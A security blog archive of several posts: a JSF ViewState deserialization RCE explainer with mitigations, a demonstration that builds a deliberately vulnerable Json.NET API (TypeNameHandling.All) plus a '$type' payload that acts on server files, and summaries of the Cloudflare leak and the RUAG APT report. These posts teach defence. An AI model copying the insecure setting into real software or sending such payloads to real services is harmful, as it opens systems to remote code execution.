In 2015 at the AppSec California conference Gabriel Lawrence and Chris Frohoff gave a presentation with the title Marshalling Pickles (how deserializing objects can ruin your day). This presentation shed some light on forgotten problems with Java object serialization and led to the discovery of several severe remote code execution (RCE) vulnerabilities.

Unfortunately, it led some people to believe that the vulnerability could be mitigated by removing/updating certain versions of Apache Commons Collections. That action can indeed help, but it does not solve the root cause of the problem: Deserialization of Untrusted Data (CWE-502). In other words:
The use of a 'vulnerable' Apache Commons Collections version does not mean that the application is vulnerable, neither does the absence of such a library version mean that the application is not vulnerable.
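The root of the problem can be illustrated without any real gadget: any code in a class’s private readObject method runs as a side effect of deserialization, before the caller can validate anything. The NoisyGadget class below is a harmless stand-in we made up for illustration:

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

public class DeserializationDemo {

    // Harmless stand-in for a "gadget" class: its readObject() runs as a
    // side effect of deserialization, before the caller sees the object.
    static class NoisyGadget implements Serializable {
        private static final long serialVersionUID = 1L;

        private void readObject(ObjectInputStream in)
                throws IOException, ClassNotFoundException {
            in.defaultReadObject();
            System.out.println("side effect during deserialization");
        }
    }

    public static void main(String[] args) throws Exception {
        // "Attacker" side: serialize the gadget into a byte stream
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(new NoisyGadget());
        }
        // "Server" side: deserializing the untrusted bytes triggers the
        // gadget's code immediately; no cast or method call is needed.
        try (ObjectInputStream ois = new ObjectInputStream(
                new ByteArrayInputStream(bos.toByteArray()))) {
            ois.readObject();
        }
    }
}
```

Real gadget chains (like the InvokerTransformer chain mentioned below) exploit exactly this window, just with far more dangerous side effects.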

However, after a malicious hacker shut down and encrypted the systems of the San Francisco Municipal Transportation Agency via a "Mad Gadget"/"Apache Commons Collections Deserialization Vulnerability" Google started Operation Rosehub. The aim of Operation Rosehub was to find as many Java open source projects as possible which used an 'attacker-friendly' commons collections version as a dependency and submit pull requests to the project owners so that those projects would stop using problematic commons collections versions in newer releases.

The attack on the ViewState

Let’s assume we have a web application with a JSF based login page:

JSF based login

That login page has a ViewState that is neither encrypted nor signed. So when we look at its HTML source we see a hidden field containing the ViewState:

Unencrypted MyFaces ViewState:
<input type="hidden" name="javax.faces.ViewState" id="j_id__v_0:javax.faces.ViewState:1" value="rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwdAAML2xvZ2luLnhodG1s" autocomplete="off" />


If you decode the above ViewState using Base64 you will notice that it contains a serialized Java object. This ViewState is sent back to the server via POST when the form is submitted (e.g. on a click on Login). Before the ViewState is POSTed back to the server, the attacker replaces it with his own malicious ViewState, built with a gadget that’s already on the server’s classpath (e.g. InvokerTransformer from commons-collections-3.2.1.jar) or even a gadget that is not yet known to the public. With said malicious gadget placed in the ViewState the attacker specifies which commands he wants to run on the server. What an attacker can do is limited only by the powers of the gadgets available on the classpath of the server. In the case of the InvokerTransformer the attacker can specify which command-line commands should be executed on the server. The attacker in our example chose to start a calculator on the UI of our Linux-based server.
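You can check the first step yourself: Base64-decoding the ViewState value from the form reveals the Java serialization stream magic bytes AC ED 00 05 (the familiar rO0AB prefix in Base64), a reliable tell-tale of a serialized Java object:

```java
import java.util.Base64;

public class ViewStateDecoder {
    public static void main(String[] args) {
        // ViewState value taken from the login form above
        String viewState =
            "rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwdAAML2xvZ2luLnhodG1s";
        byte[] raw = Base64.getDecoder().decode(viewState);
        // Serialized Java objects always start with the magic bytes AC ED 00 05
        StringBuilder sb = new StringBuilder();
        for (int i = 0; i < 4; i++) {
            sb.append(String.format("%02X ", raw[i] & 0xFF));
        }
        System.out.println(sb.toString().trim());
    }
}
```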

After the attacker has sent his modified form back to the server the JSF implementation tries to deserialize the provided ViewState. Even before the deserialization of the ViewState has finished, the command is executed and the calculator is started on the server:

calculator started via a JSF ViewState

Everything happened before the JSF implementation could take a look at the ViewState and decide that it was no good. When the ViewState is found to be invalid, an error like “View expired” is typically sent back to the client. But by then it’s already too late. The attacker had access to the server and has run his commands. (Most real-world attackers don’t start a calculator; they typically deploy a remote shell, which they then use to access the server.)

=> All in all this example demonstrates a very dangerous unauthenticated remote code execution (RCE) vulnerability.

(Almost the same attack scenario against JSF as depicted above was already outlined and demonstrated in the 2015 presentation (pages 65 to 67): Marshalling Pickles, presented by Frohoff and Lawrence.)

The preconditions for a successful attack

Now, what are the ingredients for a disaster?

  • unencrypted ViewState
  • Gadget on the classpath of the server
  • In case of Mojarra: ViewState configured to reside on the client
  • In case of MyFaces: ViewState configured to reside on the client or the server

Let’s have a look at those points in relation to the two JSF implementations.

Oracle Mojarra (JSF reference implementation)

As said before, Oracle Mojarra is the JSF Reference Implementation (RI) but might not be known under that name. It might be known as Sun JSF RI, recognized by the Java package name com.sun.faces or by the ambiguous jar name jsf-impl.jar.

Mojarra: unencrypted ViewState

So here’s the thing: Mojarra did not encrypt and sign the client-side ViewState by default in most of the versions of 2.0.x and 2.1.x. It is important to note that a server-side ViewState is the default in both JSF implementations, but a developer could easily switch the configuration to use a client-side ViewState by setting the javax.faces.STATE_SAVING_METHOD param to client. The param name in no way gives away that changing it to client introduces grave remote code execution vulnerabilities (e.g. a client-side ViewState might be used in clustered web applications).

Whilst client-side ViewState encryption is the default in Mojarra 2.2 and later versions it was not for the 2.0.x and 2.1.x branches. However, in May 2016 the Mojarra developers started backporting default client-side ViewState encryption to 2.0.x and 2.1.x when they realized that unencrypted ViewStates lead to RCE vulnerabilities.

So at least version 2.1.29-08 (released in July 2016) from the 2.1.x branch and version 2.0.11-04 (also released in July 2016) from the 2.0.x branch have encryption enabled by default.

When we analyzed the Mojarra libraries we noticed that Red Hat also releases Mojarra versions for the 2.1.x and 2.0.x branches, the latest being 2.1.29-jbossorg-1 and 2.0.4-b09-jbossorg-4. Since both releases shipped without default ViewState encryption we contacted Red Hat and they promptly created Bug 1479661 - JSF client side view state saving deserializes data in their bugtracker with the following mitigation advice for the 2.1.x branch:

A vulnerable web application needs to have set javax.faces.STATE_SAVING_METHOD to 'client' to enable client-side view state saving. The default value on Enterprise Application Platform (EAP) 6.4.x is 'server'.

If javax.faces.STATE_SAVING_METHOD is set to 'client' a mitigation for this issue is to encrypt the view by setting com.sun.faces.ClientStateSavingPassword in the application web.xml:
  <context-param>
    <param-name>javax.faces.STATE_SAVING_METHOD</param-name>
    <param-value>client</param-value>
  </context-param>

  <env-entry>
    <env-entry-name>com.sun.faces.ClientStateSavingPassword</env-entry-name>
    <env-entry-type>java.lang.String</env-entry-type>
    <env-entry-value>[some secret password]</env-entry-value>
  </env-entry>

Unfortunately, in some even older versions that mitigation approach does not work: according to this great StackOverflow answer, the JSF implementation documentation incorrectly stated that the param com.sun.faces.ClientStateSavingPassword is used to change the Client State Saving Password, while up until 2.1.18 the parameter was accidentally called just ClientStateSavingPassword (without the com.sun.faces. prefix). So providing a Client State Saving Password as documented didn’t have an effect! In Mojarra 2.1.19 and later versions the parameter name was changed to the documented name com.sun.faces.ClientStateSavingPassword.

By default Mojarra nowadays uses AES as encryption algorithm and HMAC-SHA256 to authenticate the ViewState.

Mojarra: ViewState configured to reside on the client

The default javax.faces.STATE_SAVING_METHOD setting of Mojarra is server. A developer needs to manually change it to client so that Mojarra becomes vulnerable to the above described attack scenario. If a serialized ViewState is sent to the server but Mojarra uses server-side ViewState saving, it will not try to deserialize it (however, a StringIndexOutOfBoundsException may occur).

Mojarra: Mitigation

When using Mojarra with a server-side ViewState nothing has to be done.

When using Mojarra < 2.2 and a client-side ViewState there are the following possible mitigations:

  • Update Mojarra to 2.0.11-04 or 2.1.29-08, respectively.
  • Use a server-side ViewState instead of a client-side ViewState.
  • When using older versions of Mojarra and an update or a switch to a server-side ViewState is not possible: set a ViewState password as a temporary solution and make sure it is the right parameter (not necessarily the one in the corresponding documentation).

For later Mojarra versions:

  • Check that the ViewState encryption is not disabled via the param: com.sun.faces.disableClientStateEncryption

Apache MyFaces

Apache MyFaces is the other big and widely used JSF implementation.

MyFaces: unencrypted ViewState

MyFaces does encrypt the ViewState by default, as stated in their Security configuration Wiki page:

Encryption is enabled by default. Note that encription must be used in production environments and disable it could only be valid on testing/development environments.

However, it is possible to disable ViewState encryption by setting the parameter org.apache.myfaces.USE_ENCRYPTION to false. (It would also be possible to use encryption but manually set an easily guessable password.) By default the ViewState encryption secret changes with every server restart.

By default MyFaces uses DES as encryption algorithm and HMAC-SHA1 to authenticate the ViewState. It is possible and recommended to configure more recent algorithms like AES and HMAC-SHA256.
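As a sketch (the param names below are taken from the MyFaces security configuration documentation, but verify them against your MyFaces version), a web.xml that keeps encryption enabled and selects the recommended algorithms might look like this:

```xml
<context-param>
    <!-- never set this to false in production -->
    <param-name>org.apache.myfaces.USE_ENCRYPTION</param-name>
    <param-value>true</param-value>
</context-param>
<context-param>
    <param-name>org.apache.myfaces.ALGORITHM</param-name>
    <param-value>AES</param-value>
</context-param>
<context-param>
    <param-name>org.apache.myfaces.MAC_ALGORITHM</param-name>
    <param-value>HmacSHA256</param-value>
</context-param>
```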

MyFaces: ViewState configured to reside on the client

The default javax.faces.STATE_SAVING_METHOD setting of MyFaces is server. But MyFaces always deserializes the client-provided ViewState regardless of that setting. So it is of great importance to not disable encryption when using MyFaces!

(We created an issue in the MyFaces bug tracker: MYFACES-4133 Don’t deserialize the ViewState-ID if the state saving method is server, maybe this time the wish for more secure defaults will catch on.)

MyFaces: Mitigation

When using MyFaces make sure that encryption of the ViewState is not disabled (via org.apache.myfaces.USE_ENCRYPTION) regardless if the ViewState is stored on the client or the server.

Final thoughts

Most facts about JSF ViewStates and their dangers presented in this blog post are not exactly new but it seems they were never presented in such a condensed way. It showed once more that seemingly harmless configuration changes can lead to serious vulnerabilities.

=> One of the problems seems to be that there is not enough knowledge transfer between security researchers and developers who actually use and configure libraries that might be dangerous when configured in certain ways.


13 Jun 2017 | Peter Stöckli

How to configure Json.NET to create a vulnerable web API

tl;dr No, of course, you don’t want to create a vulnerable JSON API. So when using Json.NET: Don’t use another TypeNameHandling setting than the default: TypeNameHandling.None.

Intro

In May 2017 Moritz Bechler published his MarshalSec paper where he gives an in-depth look at remote code execution (RCE) through various Java serialization/marshaller libraries like Jackson and XStream. In the conclusion of the detailed paper, he mentions that this kind of exploitation is not limited to Java but might also be possible in the .NET world through the Json.NET library. Newtonsoft’s Json.NET is one of the most popular .NET libraries and allows deserializing JSON into .NET classes (C#, VB.NET).

So we had a look at Newtonsoft.Json and indeed found a way to create a web application that allows remote code execution via a JSON based REST API. For the rest of this post we will show you how to create such a simple vulnerable application and explain how the exploitation works. It is important to note that this kind of vulnerability in web applications is most of the time not a vulnerability in the serializer library but a configuration mistake. The idea is of course to raise awareness with developers to prevent such flaws in real .NET web applications.

The sample application

The following hypothetical ASP.NET Core sample application was tested with .NET Core 1.1. For other .NET framework versions slightly different JSONs might be necessary.

TypeNameHandling

The key in making our application vulnerable to “Deserialization of untrusted data” is to enable type name handling in the SerializerSettings of Json.NET. This tells Json.NET to write type information in the field “$type” of the resulting JSON and look at that field when deserializing.

In our sample application we set this SerializerSettings globally in the ConfigureServices method in Startup.cs:

Startup.cs
[..]
services.AddMvc().AddJsonOptions(options =>
{
    options.SerializerSettings.TypeNameHandling = TypeNameHandling.All;
});
[..]


The following TypeNameHandling settings are vulnerable to this attack:

TypeNameHandling.All
TypeNameHandling.Auto
TypeNameHandling.Arrays
TypeNameHandling.Objects

In fact, the only setting that is not vulnerable is the default: TypeNameHandling.None

The official Json.NET TypeNameHandling documentation explicitly warns about this:

TypeNameHandling should be used with caution when your application deserializes JSON from an external source. Incoming types should be validated with a custom SerializationBinder when deserializing with a value other than None.

But as the MarshalSec paper points out: not all developers read the documentation of the libraries they’re using.

The REST web service

To offer a remote attack possibility in our web application we created a small REST API that allows POSTing a JSON object.

InsecureController.cs
[..]
[HttpPost]
public IActionResult Post([FromBody]Info value)
{
    if (value == null)
    {
        return NotFound();
    }
    return Ok();
}
[..]


As you may have noticed we accept a body value of the type Info, which is our own small dummy class:

Info.cs
public class Info
{
    public string Name { get; set; }
    public dynamic obj { get; set; }
}

The exploitation

To “use” our newly created vulnerability we simply POST a type-enhanced JSON to our web service:

POSTed JSON with HTTP Client

Et voilà: we executed code on the server!

Wait… what? But how?

Here’s how it works

When sending a custom JSON to a REST service that is handled by a deserializer that has support for custom type name handling in combination with the dynamic keyword the attacker can specify the type he’d like to have deserialized on the server.

So let’s have a look at the JSON we sent:

Rogue JSON
{
	"obj": {
		"$type": "System.IO.FileInfo, System.IO.FileSystem",
		"fileName": "rce-test.txt",
		"IsReadOnly": true
	}
}


The line:

"$type": "System.IO.FileInfo, System.IO.FileSystem",

specifies the class FileInfo from the namespace System.IO in the assembly System.IO.FileSystem.

The deserializer will instantiate a FileInfo object by calling the public constructor public FileInfo(String fileName) with the given fileName “rce-test.txt” (a sample file we created at the root of our insecure web app). Json.NET prefers parameterless default constructors over constructors with parameters, but since the default constructor of FileInfo is private it uses the one with a single parameter. Afterwards it will set “IsReadOnly” to true. However, this does not simply set the “IsReadOnly” flag via reflection to true. What happens instead is that the deserializer calls the setter for IsReadOnly and the code of the setter is executed.

What happens when you call the IsReadOnly setter on a FileInfo instance is that the file is actually set to read-only.

We see that indeed the read-only flag has been set on the rce-test.txt file on the server: rce-test.txt file properties with read-only flag set

A small side effect of this vulnerable service implementation is that we can also check whether a file exists on the server. If the file sent in the “fileName” field does not exist an exception is thrown when the setter for IsReadOnly is called and the server returns NotFound (404) to the caller.

To perform even more sinister work an attacker could search the .NET framework codebase or third party libraries for classes that execute code in the constructor and/or setters. The FileInfo class here is just used as a very simple example.

Summary

When providing Json.NET based REST services always leave the default TypeNameHandling at TypeNameHandling.None. When other TypeNameHandling settings are used an attacker might be able to provide a type he wants the serializer to deserialize and as a result unwanted code could be executed on the server.

The described behavior is of course not unique to Json.NET but is also implemented by other libraries that support serialization, e.g. when using System.Web.Script.Serialization.JavaScriptSerializer with a type resolver (e.g. SimpleTypeResolver).

Update (28 Jul 2017)

At Black Hat USA 2017 Alvaro Muñoz and Oleksandr Mirosh held a talk with the title “Friday the 13th: JSON Attacks”. Muñoz and Mirosh had an in-depth look at different .NET (FastJSON, Json.NET, FSPickler, Sweet.Jayson, JavascriptSerializer, DataContractJsonSerializer) and Java (Jackson, Genson, JSON-IO, FlexSON, GSON) JSON libraries. The conclusions regarding Json.NET are the same as in this blog post: basically, do not use another TypeNameHandling than TypeNameHandling.None, or use a SerializationBinder to whitelist types (as in the documentation of Json.NET).

They also presented new gadgets, which allow more sinister attacks than the one published in this blog post (the gadgets might not work with all JSON/.NET framework combinations):

  • System.Configuration.Install.AssemblyInstaller: "Execute payload on local assembly load"
  • System.Activities.Presentation.WorkflowDesigner: "Arbitrary XAML load"
  • System.Windows.ResourceDictionary: "Arbitrary XAML load"
  • System.Windows.Data.ObjectDataProvider: "Arbitrary Method Invocation"

In addition to their findings they had a look at .NET open source projects which made use of any of those different JSON libraries with type support and found several vulnerabilities.

Both the white paper[pdf] and the slides[pdf] are available on the Black Hat site.

24 Feb 2017 | Peter Stöckli

The Cloudflare leak

Introduction

On the 23rd of February Tavis Ormandy of Google’s Project Zero made the following security vulnerability accessible to the public: Cloudflare Reverse Proxies are Dumping Uninitialized Memory. The vulnerability affects many Cloudflare customers and especially their users. A vulnerable software component in Cloudflare’s reverse proxies led to the disclosure of Personally identifiable information (PII) of users around the world. Since Cloudflare reverse proxies are shared between customers, user information could emerge in a totally different place on the Internet.

The report describes how the security researchers at Google experienced the “cloudbleed” situation:

We fetched a few live samples, and we observed encryption keys, cookies, passwords, chunks of POST data and even HTTPS requests for other major cloudflare-hosted sites from other users. Once we understood what we were seeing and the implications, we immediately stopped and contacted cloudflare security.

The report contains redacted user information from the ride-sharing unicorn Uber, health tracking company FitBit and dating site OkCupid.

How Cloudflare works

Let’s have a quick look at how Cloudflare works. Typically Cloudflare’s customers use their services for DDoS (Distributed Denial of Service) protection. Often the customers use DNS services provided by Cloudflare and/or their traffic is redirected via Cloudflare’s reverse proxies before the traffic is sent to the customer’s web server. From a user’s point of view: the user’s traffic to the reverse proxy is encrypted, where it’s decrypted and analyzed by Cloudflare’s algorithms.

+---------+             +------------+               +--------------+
|  User   |  via HTTPS  | Cloudflare |  via HTTP(S)  |   Customer   |
|(Browser)+------------>+ (Reverse   +-------------->| (Web server) |
|(Mobile) |             |   Proxy)   |               |              |
+---------+             +------------+               +--------------+

Cloudflare’s Response

Cloudflare has published a detailed report, where Cloudflare’s talented security guys describe the technical part of the vulnerability: Incident report on memory leak caused by Cloudflare parser bug.

They write that the earliest leaking could have started on the 22nd of September 2016.

They also write:

The infosec team worked to identify URIs in search engine caches that had leaked memory and get them purged. With the help of Google, Yahoo, Bing and others, we found 770 unique URIs that had been cached and which contained leaked memory. Those 770 unique URIs covered 161 unique domains. The leaked memory has been purged with the help of the search engines. We also undertook other search expeditions looking for potentially leaked information on sites like Pastebin and did not find anything.

However, users on Twitter reported that they still found cached web pages using Google or Bing.

What’s important?

One important point is that it was not necessarily a Cloudflare customer’s own site that leaked information about its users: a totally different site of another Cloudflare customer could have been leaking that user information.

Another important point is that the listed search engines are not the only ones collecting and storing information from websites in the Internet. Think of caches, web crawlers, archive sites, solutions that store the content of websites for legal reasons, the list goes on…

Even our newly developed web application security scanner SecBot, which continuously scans web applications for vulnerabilities, stores the HTTP responses of its requests. Since we’re still in the development phase, SecBot hasn’t yet tested a site hosted behind a Cloudflare reverse proxy. Had that been the case, the SecBot database could contain sensitive data of Cloudflare customers. And so could many other crawlers in the world.

And now?

If you want to act proactively you can change your passwords on sites known to be using Cloudflare (however, not all sites using Cloudflare services are affected). Many websites will probably ask you to change your password and revoke OAuth tokens in the coming days. As said before, the infosec people working at Cloudflare are competent and will hopefully find a solution that prevents such a huge issue from ever happening again.

26 May 2016 | Peter Stöckli

RUAG APT report published by government agency

Introduction

The Swiss governmental computer emergency response team (GovCERT.ch) has published a detailed technical report about the Advanced Persistent Threat (APT) that targeted RUAG. RUAG, best known for RUAG Defence, is originally a spin-off of the Swiss army and is fully owned by the Swiss state. It is remarkable and laudable that they decided to share this kind of information. The motivation of the GovCERT is explained in the conclusion:

"[..] One of the most effective countermeasures from a victim’s perspective is the sharing of information about such attacks with other organizations, also crossing national borders. This is why we decided to write a public report about this incident, and this is why we strongly believe to share as much information as possible. If this done by any affected party, the price for the attacker raises, as he risks to be detected in every network he attacked in different countries. [..]"

Case

The attack, which lasted from an unknown date (assumed to be in 2014) to the 3rd of May 2016, is introduced like this:

"The cyber attack is related to a long running campaign of the threat actor around Epic/Turla/Tavdig. The actor has not only infiltrated many governmental organizations in Europe, but also commercial companies in the private sector in the past decade. RUAG has been affected by this threat since at least September 2014. The actor group used malware that does not encompass any root kit technologies (even though the attackers have rootkits within their malware arsenal). An interesting part is the lateral movement, which has been done with a lot of patience. [..]"

The report goes into technical depth and reveals interesting details of the inner workings and communication channels of the observed malware. The researchers who disassembled the binaries analyzed the encryption algorithms and communication methods used.

For example, according to page 20 of the report, the malware asymmetrically encrypted the stolen data, encoded it with Base64, and put it into a server response like this:

<html>
    <head>
        <title>Authentication Required</title>
    </head>
    <body>
        <div>B2...KD9eg=</div>
    </body>
</html>

This seems like a fairly uncharacteristic move for a host that does not normally act as a web server and should be detectable by an application firewall.

Recommendations

The report makes some generic recommendations that should help companies to prevent such attacks or at least reduce their impact and improve the forensic readiness in case something happens. Some of those countermeasure recommendations on the system level are:

  • Consider using Applocker, a technique from Microsoft, which allows you to decide, based on GPOs (Group Policy Objects), which binaries are allowed to be executed, and under which paths. [..]
  • Reduce the privileges a user has when surfing the web or doing normal office tasks. High privileges may only be used when doing system administration tasks.
  • This actor, as well as many other actor groups, relies on the usage of “normal” tools for their lateral movement. The usage of such tools can be monitored. E.g. the start of a tool such as psexec.exe or dsquery.exe from within a normal user context should raise an alarm.
  • Keep your systems up-to-date and reduce their attack surface as much as possible (e.g.: Do you really need to have Flash deployed on every system?)
  • Use write blockers and write protection software for your USB/Firewire devices, or even disable them for all client devices
  • Block the execution of macros, or require signed macros

Side note: On the 19th of April 2016 Casey Smith disclosed an AppLocker Bypass that instruments regsvr32 to execute remote scripts.

Other areas of recommendations concern the Active Directory, the network, logging, system management and organizational aspects. Most of the recommendations sound straightforward and should already be in place in a similar manner in secure environments of bigger companies. Interestingly, the report does not reference ISO 27001, ISO 27002 or any other standards in the information security field, while its generic recommendations would align very well. Most likely the main focus of the authors was to give practical tips free of management lingo, reaching a broad, heterogeneous audience.

In general, the work that went into creating and publishing this report is appreciated and will hopefully have an impact.

03 May 2016 | Peter Stöckli

Alphabot Security Blog

We slightly redesigned our website and started the Alphabot Security Blog where we will write about security vulnerabilities and development tips for web applications.